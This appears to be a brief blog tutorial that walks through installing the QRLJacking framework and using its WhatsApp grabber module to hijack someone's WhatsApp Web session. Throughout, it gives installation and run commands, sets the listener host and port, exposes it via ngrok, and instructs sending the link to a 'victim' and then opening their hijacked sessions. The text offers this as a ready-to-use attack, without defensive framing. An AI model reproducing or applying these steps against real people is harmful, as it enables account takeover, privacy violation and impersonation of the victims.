Whatsapp Session Hijacking using QRLJacking Framework - J Techcode

Setting Up Terminal For QRLJacking 

  • apt update
  • apt install git
  • apt install python
  • apt install python3
  • pip install --upgrade pip

Installation of QRLJacking

  • git clone https://github.com/OWASP/QRLJacking.git
  • ls [ To check QRLJacking Directory ]
  • cd QRLJacking
  • ls
  • cd QRLJacker
  • ls
  • If permission access denied to change mode
  • chmod +x *
  • Install the requirements.txt
  • pip install -r requirements.txt
  • Now run the QrlJacker.py
  • python3 QrlJacker.py
  • Now the Framework Opened & run the modules 

  • Using show command to check module available & use command used to run that module
  • Now only one module grabber/whatsapp
  • options command to check input options
  • set port 4345
  • set host youripaddress [ only for LAN ] or
  • set host localhost [ Run Ngrok on another terminal tab ]
  • run command to run the module

  • Open ngrok terminal and copy the ngrok link send to your victim
  • Now the victim scan the attacker's QR code at the time whatsapp session hijacked successfully

  • Now interact with hijacked sessions
  • sessions [ to listing sessions with Id ]
  • sessions -i Id [ Eg: sessions -i 0 ]


  • Now automatically web.whatsapp.com open on new browser windows and victim whatsapp loading
  • Successfully loaded